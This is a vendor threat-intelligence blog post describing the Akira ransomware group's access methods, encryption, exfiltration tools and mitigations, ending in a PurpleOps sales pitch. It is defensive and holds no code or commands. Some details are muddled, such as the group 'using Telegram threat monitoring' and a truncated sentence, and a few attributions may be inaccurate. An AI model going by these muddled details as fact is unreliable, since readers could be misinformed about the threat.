Analyzing the Akira Ransomware Group’s Tactics, Techniques, and Procedures (TTPs)
Estimated reading time: 12 minutes
Key Takeaways:
- Akira ransomware emerged in March 2023, targeting various sectors.
- It employs a double extortion model, encrypting systems and exfiltrating data.
- Mitigation strategies include strong password policies, MFA, and VPN patching.
- Akira has potential links to Conti ransomware group.
- PurpleOps offers services to protect against Akira, including dark web monitoring.
Table of Contents:
- Overview of Akira Ransomware
- Initial Access and Targeting
- Encryption and Data Exfiltration
- Negotiation and Payment
- Technical Analysis of the Ransomware
- Affiliate Model
- Recent Activities and Trends
- Mitigation Strategies
- Specific TTPs Observed
- Impact on Critical Infrastructure
- Response and Recovery
- Tools and Techniques
- Akira Black
- Telegram and underground forum intelligence
- Practical Takeaways
- PurpleOps and Ransomware Protection
- FAQ
Overview of Akira Ransomware
The Akira ransomware group has become a significant threat in the cybersecurity space since its emergence in March 2023. This blog post provides an in-depth analysis of the Akira ransomware group’s tactics, techniques, and procedures (TTPs), focusing on its origins, attack vectors, encryption methods, and mitigation strategies. Understanding these elements is crucial for organizations aiming to bolster their defenses against this prevalent cyber threat.
Akira is a ransomware operation that targets businesses across various sectors, including education, finance, and manufacturing. The group’s name is a reference to the 1988 Japanese animated cyberpunk film “Akira.” Since its emergence, the group has demonstrated a continuous capability to adapt and refine its methods, posing a persistent challenge to cybersecurity professionals.
Initially believed to be a novel operation, there is growing evidence suggesting a connection between Akira and the Conti ransomware group. Similarities in source code between Akira and Conti, along with other ransomware variants, have led some researchers to propose a possible rebrand or offshoot scenario. This potential connection underscores the complex web of affiliations and re-emergence that characterizes the ransomware ecosystem.
Initial Access and Targeting
Akira primarily targets organizations in North America and Europe. The group employs several initial access vectors, including exploiting vulnerabilities in VPNs, using compromised credentials, and conducting phishing campaigns. Specifically, they have been known to exploit vulnerabilities in Cisco ASA VPNs, making this a critical area for organizations to secure.
Compromised credentials remain a common entry point, emphasizing the importance of robust password policies and multi-factor authentication. Phishing campaigns, often leveraging social engineering tactics, continue to be an effective method for the group to gain initial access to targeted networks.
Encryption and Data Exfiltration
Akira employs a double extortion model, encrypting victims’ systems and exfiltrating sensitive data. This approach increases the pressure on victims to pay the ransom, as the threat of public data disclosure can be as damaging as the disruption caused by encryption.
The encryption algorithm used by Akira is a combination of ChaCha20 and RSA. ChaCha20 is a stream cipher known for its speed and efficiency, while RSA is an asymmetric encryption algorithm used for key exchange. Data exfiltration tactics involve tools like Rclone and FileZilla to steal large amounts of data before encryption, often targeting critical databases, documents, and virtual machine images. This activity can be detected with a breach detection solution.
Negotiation and Payment
Akira operates a dark web leak site where they publish stolen data from victims who do not pay the ransom. This site serves as a public shaming platform, further incentivizing victims to comply with the group’s demands. Communication with victims typically occurs via email and a dedicated chat platform, where ransom demands are negotiated. Ransom demands vary depending on the size and financial status of the victim organization, with payments usually requested in Bitcoin to maintain anonymity.
Technical Analysis of the Ransomware
The Akira ransomware is written in C++ and is highly customizable, allowing the group to adapt the malware to different environments and evade detection. It uses various techniques to evade detection, including process injection and anti-analysis mechanisms. Process injection involves injecting malicious code into legitimate processes to hide its activity. Anti-analysis mechanisms are designed to thwart attempts to reverse engineer or analyze the malware, making it more difficult for security researchers to understand its functionality.
The ransomware is designed to encrypt files with specific extensions, targeting databases, documents, and virtual machine images. This targeted approach ensures that critical data is encrypted, maximizing the impact on the victim organization.
Affiliate Model
Akira operates under an affiliate model, where different groups of cybercriminals are recruited to deploy the ransomware. This allows the core Akira team to focus on developing and maintaining the ransomware, while affiliates handle the actual attacks. This division of labor enables the group to scale its operations and increase its reach.
Recent Activities and Trends
Akira has been increasingly active, with a reported surge in attacks in late 2023 and early 2024. They continue to target a wide range of organizations, and their tactics are constantly. The emergence of Akira Black, a more recent variant written in Rust, demonstrates the group’s commitment to innovation and adaptation.
Mitigation Strategies
Organizations can mitigate the risk of Akira ransomware attacks by implementing several key security measures:
- Strong Password Policies: Enforce strong, unique passwords and regularly update them.
- Multi-Factor Authentication: Enable multi-factor authentication (MFA) for all critical accounts and services.
- VPN Patching: Promptly patch vulnerabilities in VPNs, particularly those in Cisco ASA VPNs.
- Security Awareness Training: Provide regular security awareness training to employees to educate them about phishing attacks and other social engineering tactics.
- Data Backups: Regularly back up data to a secure, off-site location.
- Network Segmentation: Implement network segmentation to limit the lateral movement of attackers within the network.
- Endpoint Detection and Response (EDR): Deploy EDR solutions to detect and respond to malicious activity on endpoints.
- Cyber Threat Intelligence: Implement a comprehensive cyber threat intelligence platform to stay informed about the latest threats and vulnerabilities.
Specific TTPs Observed
Akira employs a range of specific tactics, techniques, and procedures (TTPs) in its attacks:
- Exploiting CVE-2020-3187: Exploiting CVE-2020-3187 (Cisco ASA VPN vulnerability) to gain initial access.
- RDP for Lateral Movement: Using RDP (Remote Desktop Protocol) for lateral movement within the network.
- Disabling Security Tools: Disabling security tools like antivirus software to evade detection.
- Deleting Shadow Copies: Deleting shadow copies to prevent data recovery.
- PowerShell Scripts: Employing PowerShell scripts for reconnaissance and deployment.
Impact on Critical Infrastructure
While not exclusively targeting critical infrastructure, Akira’s attacks on various sectors, including manufacturing and finance, can indirectly impact critical services and supply chains. The disruption of these sectors can have cascading effects on essential services, highlighting the need for organizations in these sectors to prioritize cybersecurity. Organizations need supply-chain risk monitoring.
Response and Recovery
In the event of an Akira ransomware attack, organizations should take immediate steps to contain the damage and initiate recovery procedures:
- Isolate Affected Systems: Immediately isolate affected systems to prevent further spread of the ransomware.
- Notify Law Enforcement: Notify law enforcement authorities, such as the FBI or local police, to report the incident.
- Engage Incident Response Experts: Engage with incident response experts to assist with containment, eradication, and recovery efforts.
- Data Recovery: Explore data recovery options, including restoring from backups or negotiating with the attackers (though not recommended).
Tools and Techniques
Akira is observed using Cobalt Strike for command and control, enabling them to remotely control compromised systems and coordinate their attacks. They also use custom tools for network scanning and credential harvesting, allowing them to gather information about the targeted network and identify potential vulnerabilities.
Akira Black
The emergence of Akira Black, a more recent variant of the Akira ransomware family written in Rust, highlights the group’s ongoing development efforts. Rust is a modern programming language known for its memory safety and performance, making it an attractive choice for malware developers. Akira Black targets both Windows and Linux systems, expanding the group’s potential victim pool.
Telegram and underground forum intelligence
The group uses Telegram threat monitoring to amplify their impact, sharing stolen data and communicating with affiliates. This allows them to quickly disseminate information and coordinate their activities. The underground forum intelligence is also very relevant.
Practical Takeaways
For Technical Readers:
- Implement network segmentation to restrict lateral movement.
- Regularly audit and patch VPN infrastructure, especially Cisco ASA devices.
- Deploy and maintain Endpoint Detection and Response (EDR) solutions.
- Utilize threat intelligence feeds to stay updated on Akira’s latest TTPs.
- Implement application whitelisting to prevent unauthorized software execution.
For Non-Technical Readers (Business Leaders):
- Ensure your organization has a comprehensive incident response plan.
- Invest in employee security awareness training, focusing on phishing and social engineering.
- Prioritize data backup and recovery strategies.
- Consider cyber insurance to mitigate financial losses from ransomware attacks.
- Engage with cybersecurity consultants to assess and improve your security posture.
PurpleOps and Ransomware Protection
PurpleOps offers a range of services designed to help organizations protect themselves from ransomware attacks, including Akira. Our cyber threat intelligence platform provides real-time ransomware intelligence, dark web monitoring service, and live ransomware API access, enabling organizations to stay ahead of emerging threats. We can offer brand leak alerting and supply-chain risk monitoring. Our services include:
- Red Team Operations: Simulate real-world attacks to identify vulnerabilities and weaknesses in your defenses.
- Penetration Testing: Conduct thorough assessments of your systems and networks to uncover exploitable vulnerabilities.
- Supply Chain Information Security: Ensure that your vendors and partners meet the same high standards of security as your organization.
- Dark Web Monitoring: Monitor the dark web for mentions of your organization, stolen credentials, and other sensitive information.
By leveraging PurpleOps’ expertise and services, organizations can significantly reduce their risk of falling victim to Akira ransomware and other cyber threats.
To learn more about how PurpleOps can help you protect your organization from ransomware, visit our website or contact us for a consultation at PurpleOps Solutions.
FAQ
Q: What is Akira ransomware?
A: Akira is a ransomware group that emerged in March 2023, targeting businesses across various sectors with a double extortion model.
Q: How does Akira gain initial access to networks?
A: Akira primarily uses exploited VPN vulnerabilities, compromised credentials, and phishing campaigns to gain initial access.
Q: What steps can organizations take to mitigate the risk of Akira ransomware attacks?
A: Implementing strong password policies, enabling MFA, patching VPN vulnerabilities, providing security awareness training, and regularly backing up data are crucial mitigation steps.
Q: Is there a connection between Akira and other ransomware groups?
A: Evidence suggests a possible connection between Akira and the Conti ransomware group due to similarities in source code.
Q: What is Akira Black?
A: Akira Black is a more recent variant of the Akira ransomware family written in Rust, targeting both Windows and Linux systems.